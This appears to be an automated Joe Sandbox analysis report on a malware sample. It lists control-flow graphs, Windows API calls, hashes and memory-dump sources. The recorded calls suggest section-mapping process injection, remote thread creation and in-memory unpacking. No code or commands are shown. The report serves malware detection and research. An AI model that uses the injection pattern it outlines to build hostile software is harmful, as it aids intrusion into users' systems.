                                                                                                                                              • Opcode Fuzzy Hash: 8a8c107c90811e6390bac5a4fc857e8bc3aa7e6139d6a18d575a9703efd087d7
                                                                                                                                              • Instruction Fuzzy Hash: 6DA1D571846624ABC720EB61DC45BDF7B78EF4D314F0180AAF609A3161DB385A85CBED

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 155 401514-401533 157 401524-40152f 155->157 158 401536-40156e call 401193 155->158 157->158 167 401570 158->167 168 401573-401578 158->168 167->168 170 401898-4018a0 168->170 171 40157e-40158f 168->171 170->168 176 4018a5-4018b7 170->176 174 401595-4015be 171->174 175 401896 171->175 174->175 185 4015c4-4015db NtDuplicateObject 174->185 175->176 181 4018c5 176->181 182 4018bc-4018e3 call 401193 176->182 181->182 185->175 187 4015e1-401605 NtCreateSection 185->187 189 401661-401687 NtCreateSection 187->189 190 401607-401628 NtMapViewOfSection 187->190 189->175 191 40168d-401691 189->191 190->189 193 40162a-401646 NtMapViewOfSection 190->193 191->175 194 401697-4016b8 NtMapViewOfSection 191->194 193->189 196 401648-40165e 193->196 194->175 197 4016be-4016da NtMapViewOfSection 194->197 196->189 197->175 199 4016e0 call 4016e5 197->199
                                                                                                                                              APIs
                                                                                                                                              • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                                                                              • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                                                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                                                                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                                                                                                                              • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                                                                                                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                                                                                                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1783452095.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_HaPJ2rPP6w.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Section$View$Create$DuplicateObject
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1546783058-0
                                                                                                                                              • Opcode ID: 030196af5c35925124d1a5e0ae71aae975fd3bc268d3cb8e752286d8b76e3a9f
                                                                                                                                              • Instruction ID: b77a8bcfde574781322ebaec397cd5e92af5eb717990e6e7793f83a32abcc97b
                                                                                                                                              • Opcode Fuzzy Hash: 030196af5c35925124d1a5e0ae71aae975fd3bc268d3cb8e752286d8b76e3a9f
                                                                                                                                              • Instruction Fuzzy Hash: 24615E71900244FBEB209F95CC49FAF7BB8EF85700F20412AF912BA1E5D6749A01DB69

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 202 4014fe-401503 203 401531-40156e call 401193 202->203 204 401506-401511 202->204 214 401570 203->214 215 401573-401578 203->215 214->215 217 401898-4018a0 215->217 218 40157e-40158f 215->218 217->215 223 4018a5-4018b7 217->223 221 401595-4015be 218->221 222 401896 218->222 221->222 232 4015c4-4015db NtDuplicateObject 221->232 222->223 228 4018c5 223->228 229 4018bc-4018e3 call 401193 223->229 228->229 232->222 234 4015e1-401605 NtCreateSection 232->234 236 401661-401687 NtCreateSection 234->236 237 401607-401628 NtMapViewOfSection 234->237 236->222 238 40168d-401691 236->238 237->236 240 40162a-401646 NtMapViewOfSection 237->240 238->222 241 401697-4016b8 NtMapViewOfSection 238->241 240->236 243 401648-40165e 240->243 241->222 244 4016be-4016da NtMapViewOfSection 241->244 243->236 244->222 246 4016e0 call 4016e5 244->246
                                                                                                                                              APIs
                                                                                                                                              • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                                                                              • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                                                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1783452095.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_HaPJ2rPP6w.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Section$CreateDuplicateObjectView
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1652636561-0
                                                                                                                                              • Opcode ID: 797714e4bcca61813209f29cc723c8138b20262a6c787ca69d6a1213da408676
                                                                                                                                              • Instruction ID: 0ec8d6d4108695f7377ece7931361284e20275783593a2318d747dbe857377b0
                                                                                                                                              • Opcode Fuzzy Hash: 797714e4bcca61813209f29cc723c8138b20262a6c787ca69d6a1213da408676
                                                                                                                                              • Instruction Fuzzy Hash: 6A5129B5900209BFEB209F95CC48FEF7BB9EF85710F14412AF912BA2A5D6749901CB24

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 249 401542-40156e call 401193 258 401570 249->258 259 401573-401578 249->259 258->259 261 401898-4018a0 259->261 262 40157e-40158f 259->262 261->259 267 4018a5-4018b7 261->267 265 401595-4015be 262->265 266 401896 262->266 265->266 276 4015c4-4015db NtDuplicateObject 265->276 266->267 272 4018c5 267->272 273 4018bc-4018e3 call 401193 267->273 272->273 276->266 278 4015e1-401605 NtCreateSection 276->278 280 401661-401687 NtCreateSection 278->280 281 401607-401628 NtMapViewOfSection 278->281 280->266 282 40168d-401691 280->282 281->280 284 40162a-401646 NtMapViewOfSection 281->284 282->266 285 401697-4016b8 NtMapViewOfSection 282->285 284->280 287 401648-40165e 284->287 285->266 288 4016be-4016da NtMapViewOfSection 285->288 287->280 288->266 290 4016e0 call 4016e5 288->290
                                                                                                                                              APIs
                                                                                                                                              • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                                                                              • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                                                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                                                                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                                                                                                                              • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                                                                                                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                                                                                                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1783452095.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_HaPJ2rPP6w.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Section$View$Create$DuplicateObject
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1546783058-0
                                                                                                                                              • Opcode ID: 2b177f7e9ccc32c3765a626e79a5c8eb6b5311b77b213a5c8649f7db25de2716
                                                                                                                                              • Instruction ID: 759091ef041ca07c69b7a79068e02688b6544eb302bab9b440b0429bbb41aca5
                                                                                                                                              • Opcode Fuzzy Hash: 2b177f7e9ccc32c3765a626e79a5c8eb6b5311b77b213a5c8649f7db25de2716
                                                                                                                                              • Instruction Fuzzy Hash: E85119B1900249BFEB209F91CC48FAF7BB8EF85B10F144169F911BA2A5D6749941CB24

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 293 401549-40156e call 401193 297 401570 293->297 298 401573-401578 293->298 297->298 300 401898-4018a0 298->300 301 40157e-40158f 298->301 300->298 306 4018a5-4018b7 300->306 304 401595-4015be 301->304 305 401896 301->305 304->305 315 4015c4-4015db NtDuplicateObject 304->315 305->306 311 4018c5 306->311 312 4018bc-4018e3 call 401193 306->312 311->312 315->305 317 4015e1-401605 NtCreateSection 315->317 319 401661-401687 NtCreateSection 317->319 320 401607-401628 NtMapViewOfSection 317->320 319->305 321 40168d-401691 319->321 320->319 323 40162a-401646 NtMapViewOfSection 320->323 321->305 324 401697-4016b8 NtMapViewOfSection 321->324 323->319 326 401648-40165e 323->326 324->305 327 4016be-4016da NtMapViewOfSection 324->327 326->319 327->305 329 4016e0 call 4016e5 327->329
                                                                                                                                              APIs
                                                                                                                                              • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                                                                              • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                                                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                                                                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                                                                                                                              • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                                                                                                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                                                                                                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1783452095.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_HaPJ2rPP6w.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Section$View$Create$DuplicateObject
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1546783058-0
                                                                                                                                              • Opcode ID: 2c5afbad373231fc2fe72851e77a16272d6e8026ab94bc2156a59f1271be232c
                                                                                                                                              • Instruction ID: 7a8a064d68380c64131d995910f5c092f0e660b32494b1024d3e535184c76cf3
                                                                                                                                              • Opcode Fuzzy Hash: 2c5afbad373231fc2fe72851e77a16272d6e8026ab94bc2156a59f1271be232c
                                                                                                                                              • Instruction Fuzzy Hash: 78510875900249BFEF209F91CC48FAFBBB8FF86B10F144159F911AA2A5E6709940CB24

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 332 401557 333 40155b-40156e call 401193 332->333 334 40154f-401554 332->334 337 401570 333->337 338 401573-401578 333->338 334->333 337->338 340 401898-4018a0 338->340 341 40157e-40158f 338->341 340->338 346 4018a5-4018b7 340->346 344 401595-4015be 341->344 345 401896 341->345 344->345 355 4015c4-4015db NtDuplicateObject 344->355 345->346 351 4018c5 346->351 352 4018bc-4018e3 call 401193 346->352 351->352 355->345 357 4015e1-401605 NtCreateSection 355->357 359 401661-401687 NtCreateSection 357->359 360 401607-401628 NtMapViewOfSection 357->360 359->345 361 40168d-401691 359->361 360->359 363 40162a-401646 NtMapViewOfSection 360->363 361->345 364 401697-4016b8 NtMapViewOfSection 361->364 363->359 366 401648-40165e 363->366 364->345 367 4016be-4016da NtMapViewOfSection 364->367 366->359 367->345 369 4016e0 call 4016e5 367->369
                                                                                                                                              APIs
                                                                                                                                              • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                                                                              • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                                                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                                                                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                                                                                                                              • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                                                                                                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                                                                                                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1783452095.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_HaPJ2rPP6w.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Section$View$Create$DuplicateObject
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1546783058-0
                                                                                                                                              • Opcode ID: 2a6c5c204d9128e257f6824072ce96b4ac123ccef225123859878a505f2b6fa6
                                                                                                                                              • Instruction ID: 25abb30e6883f9026caabbb74ebb32c420b3dbd3b7f631cb87a4d5ab1caa8f11
                                                                                                                                              • Opcode Fuzzy Hash: 2a6c5c204d9128e257f6824072ce96b4ac123ccef225123859878a505f2b6fa6
                                                                                                                                              • Instruction Fuzzy Hash: C75118B5900209BFEF209F91CC48FAFBBB8FF85B10F144169F911BA2A5D6709940CB24

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 402 402f97-402fbb 403 402fc1-402fd9 402->403 404 4030ee-4030f3 402->404 403->404 405 402fdf-402ff0 403->405 406 402ff2-402ffb 405->406 407 403000-40300e 406->407 407->407 408 403010-403017 407->408 409 403039-403040 408->409 410 403019-403038 408->410 411 403062-403065 409->411 412 403042-403061 409->412 410->409 413 403067-40306a 411->413 414 40306e 411->414 412->411 413->414 415 40306c 413->415 414->406 416 403070-403075 414->416 415->416 416->404 417 403077-40307a 416->417 417->404 418 40307c-4030eb RtlCreateUserThread NtTerminateProcess 417->418 418->404
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1783452095.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_HaPJ2rPP6w.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CreateProcessTerminateThreadUser
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1921587553-0
                                                                                                                                              • Opcode ID: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
                                                                                                                                              • Instruction ID: 1591ba869369ea84e79847af2efd18b9bf5795e6c00b1d775a4c0b4e714efbc4
                                                                                                                                              • Opcode Fuzzy Hash: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
                                                                                                                                              • Instruction Fuzzy Hash: FD414531218E0C4FD7A8EF6CA88576277D5F798311F6643AAE809D3389EA74DC1183C5

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 419 851503-85151c 420 85151e-851520 419->420 421 851527-851533 CreateToolhelp32Snapshot 420->421 422 851522 420->422 423 851535-85153b 421->423 424 851543-851550 Module32First 421->424 422->421 423->424 429 85153d-851541 423->429 425 851552-851553 call 8511c2 424->425 426 851559-851561 424->426 430 851558 425->430 429->420 429->424 430->426
                                                                                                                                              APIs
                                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 0085152B
                                                                                                                                              • Module32First.KERNEL32(00000000,00000224), ref: 0085154B
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1783948879.000000000084E000.00000040.00000020.00020000.00000000.sdmp, Offset: 0084E000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_84e000_HaPJ2rPP6w.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3833638111-0
                                                                                                                                              • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                              • Instruction ID: 2c51e01abfa8b481ba24bbd56e9ed2e3b715addadc2ea28069758071056cc2db
                                                                                                                                              • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                              • Instruction Fuzzy Hash: D1F068352007156FDF203BB9988DB6E76E8FF89726F100528EA43D10C0DB70ED494651

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 70 6b003c-6b0047 71 6b0049 70->71 72 6b004c-6b0263 call 6b0a3f call 6b0e0f call 6b0d90 VirtualAlloc 70->72 71->72 87 6b028b-6b0292 72->87 88 6b0265-6b0289 call 6b0a69 72->88 90 6b02a1-6b02b0 87->90 92 6b02ce-6b03c2 VirtualProtect call 6b0cce call 6b0ce7 88->92 90->92 93 6b02b2-6b02cc 90->93 99 6b03d1-6b03e0 92->99 93->90 100 6b0439-6b04b8 VirtualFree 99->100 101 6b03e2-6b0437 call 6b0ce7 99->101 103 6b04be-6b04cd 100->103 104 6b05f4-6b05fe 100->104 101->99 106 6b04d3-6b04dd 103->106 107 6b077f-6b0789 104->107 108 6b0604-6b060d 104->108 106->104 110 6b04e3-6b0505 106->110 111 6b078b-6b07a3 107->111 112 6b07a6-6b07b0 107->112 108->107 113 6b0613-6b0637 108->113 122 6b0517-6b0520 110->122 123 6b0507-6b0515 110->123 111->112 114 6b086e-6b08be LoadLibraryA 112->114 115 6b07b6-6b07cb 112->115 116 6b063e-6b0648 113->116 121 6b08c7-6b08f9 114->121 119 6b07d2-6b07d5 115->119 116->107 117 6b064e-6b065a 116->117 117->107 120 6b0660-6b066a 117->120 124 6b07d7-6b07e0 119->124 125 6b0824-6b0833 119->125 128 6b067a-6b0689 120->128 130 6b08fb-6b0901 121->130 131 6b0902-6b091d 121->131 132 6b0526-6b0547 122->132 123->132 126 6b07e2 124->126 127 6b07e4-6b0822 124->127 129 6b0839-6b083c 125->129 126->125 127->119 134 6b068f-6b06b2 128->134 135 6b0750-6b077a 128->135 129->114 136 6b083e-6b0847 129->136 130->131 133 6b054d-6b0550 132->133 137 6b05e0-6b05ef 133->137 138 6b0556-6b056b 133->138 139 6b06ef-6b06fc 134->139 140 6b06b4-6b06ed 134->140 135->116 141 6b084b-6b086c 136->141 142 6b0849 136->142 137->106 144 6b056f-6b057a 138->144 145 6b056d 138->145 146 6b074b 139->146 147 6b06fe-6b0748 139->147 140->139 141->129 142->114 148 6b059b-6b05bb 144->148 149 6b057c-6b0599 144->149 145->137 146->128 147->146 154 6b05bd-6b05db 148->154 149->154 154->133
                                                                                                                                              APIs
                                                                                                                                              • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 006B024D
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1783719870.00000000006B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006B0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6b0000_HaPJ2rPP6w.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AllocVirtual
                                                                                                                                              • String ID: cess$kernel32.dll
                                                                                                                                              • API String ID: 4275171209-1230238691
                                                                                                                                              • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                                              • Instruction ID: 1cbfe1bad8ad953d37be5dc3ae992457c84081cda89f7c9b413a08e1e8265b97
                                                                                                                                              • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                                              • Instruction Fuzzy Hash: 275279B5A00229DFDB64CF58C984BA9BBB1BF09304F1480E9E50DAB351DB30AE85DF14

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 372 416ae6-416aed 373 416af0-416b00 372->373 374 416b02 373->374 375 416b08-416b0b 373->375 374->375 375->373 376 416b0d-416b2e LoadLibraryW call 4164d0 call 416720 375->376 381 416b30-416b37 376->381 382 416b39-416b47 MoveFileA 381->382 383 416b4d-416b53 381->383 382->383 384 416b55 call 4164c0 383->384 385 416b5a-416b61 383->385 384->385 387 416b70-416b77 385->387 388 416b63-416b6a InterlockedDecrement 385->388 387->381 390 416b79-416b89 387->390 388->387 392 416b90-416ba0 390->392 393 416ba2 392->393 394 416ba9-416bac 392->394 393->394 394->392 395 416bae-416bb9 394->395 396 416bc0-416bc5 395->396 397 416bc7-416bcd 396->397 398 416bcf-416bd5 396->398 397->398 399 416bd7-416be4 397->399 398->396 398->399
                                                                                                                                              APIs
                                                                                                                                              • LoadLibraryW.KERNELBASE(00418374), ref: 00416B12
                                                                                                                                              • MoveFileA.KERNEL32(00000000,00000000), ref: 00416B47
                                                                                                                                              • InterlockedDecrement.KERNEL32(?), ref: 00416B6A
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1783476903.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_40b000_HaPJ2rPP6w.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: DecrementFileInterlockedLibraryLoadMove
                                                                                                                                              • String ID: k`$}$
                                                                                                                                              • API String ID: 418655872-956986773
                                                                                                                                              • Opcode ID: 43f99f8ac428f16e081c033c36405718f082dd07f42b23fb4eed68b588b4d0ee
                                                                                                                                              • Instruction ID: 42061d5068bdce50c1bf5091c343343de5c0ff0e781990f509a1e5bc66fdcea5
                                                                                                                                              • Opcode Fuzzy Hash: 43f99f8ac428f16e081c033c36405718f082dd07f42b23fb4eed68b588b4d0ee
                                                                                                                                              • Instruction Fuzzy Hash: AB2126349882208BCB20DB60DC457DABB60FB48319F1244BFEA49D7290CA38ADC4C79D

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 401 4164d0-416610 GetModuleHandleW GetProcAddress VirtualProtect
                                                                                                                                              APIs
                                                                                                                                              • GetModuleHandleW.KERNEL32(00511CE8), ref: 004165AF
                                                                                                                                              • GetProcAddress.KERNEL32(00000000,0041C210), ref: 004165EC
                                                                                                                                              • VirtualProtect.KERNELBASE(00511B2C,00511CE4,00000040,?), ref: 0041660B
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1783476903.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_40b000_HaPJ2rPP6w.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AddressHandleModuleProcProtectVirtual
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2099061454-3916222277
                                                                                                                                              • Opcode ID: ed8495ad91114ca58db7b4743c9787d6e3477e2d90cf241a67db01d1f531d50d
                                                                                                                                              • Instruction ID: 5d6b8529abac6a2ef6dc9a1a277ef6d20b5afcabe6b96dcf33e4d09f3920d241
                                                                                                                                              • Opcode Fuzzy Hash: ed8495ad91114ca58db7b4743c9787d6e3477e2d90cf241a67db01d1f531d50d
                                                                                                                                              • Instruction Fuzzy Hash: 00310310AD8781CBE301CBE8FC447813A62AB35748F04C0E89648873B5D7BE5A58D7AE

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 432 6b0e0f-6b0e24 SetErrorMode * 2 433 6b0e2b-6b0e2c 432->433 434 6b0e26 432->434 434->433
                                                                                                                                              APIs
                                                                                                                                              • SetErrorMode.KERNELBASE(00000400,?,?,006B0223,?,?), ref: 006B0E19
                                                                                                                                              • SetErrorMode.KERNELBASE(00000000,?,?,006B0223,?,?), ref: 006B0E1E
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1783719870.00000000006B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006B0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6b0000_HaPJ2rPP6w.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ErrorMode
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2340568224-0
                                                                                                                                              • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                                              • Instruction ID: 5ec0122905795958cf8b6ea84eb92189ad46b0a0d2fb6fa6a8bc84ef3f06bca4
                                                                                                                                              • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                                              • Instruction Fuzzy Hash: 19D0123114512877D7002A94DC09BCE7F1CDF05B62F008411FB0DD9180C770994147E5

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 435 4018e6-40194b call 401193 Sleep call 40141f 449 40195a-4019a5 call 401193 435->449 450 40194d-401955 call 401514 435->450 450->449
                                                                                                                                              APIs
                                                                                                                                              • Sleep.KERNELBASE(00001388), ref: 00401936
                                                                                                                                                • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                                                                                • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                                                                                • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1783452095.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_HaPJ2rPP6w.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Section$CreateDuplicateObjectSleepView
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1885482327-0
                                                                                                                                              • Opcode ID: a4b5604c3fad4e3a9f3f792e8fb47035b06f8c3694b385928224ebe720cba1b7
                                                                                                                                              • Instruction ID: 08a90aa29aaa59261053d8f0d19a3ecdc4dd21bf61fce8c4d66a51d0c793aa75
                                                                                                                                              • Opcode Fuzzy Hash: a4b5604c3fad4e3a9f3f792e8fb47035b06f8c3694b385928224ebe720cba1b7
                                                                                                                                              • Instruction Fuzzy Hash: EB11A1F660C204FAEB106AA49C61E7A3318AB40754F304137F613790F5957D9A13F66F

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 464 401915-401918 465 4018c6-4018c7 464->465 466 40191a-40194b call 401193 Sleep call 40141f 464->466 467 4018d7 465->467 468 4018ce-4018e3 call 401193 465->468 478 40195a-4019a5 call 401193 466->478 479 40194d-401955 call 401514 466->479 467->468 479->478
                                                                                                                                              APIs
                                                                                                                                              • Sleep.KERNELBASE(00001388), ref: 00401936
                                                                                                                                                • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                                                                                • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                                                                                • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1783452095.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_HaPJ2rPP6w.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Section$CreateDuplicateObjectSleepView
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1885482327-0
                                                                                                                                              • Opcode ID: 7bb1df720b8f813faa3697c6259eeb6b3a5716e5c382bc39f4698e2c5426f3b5
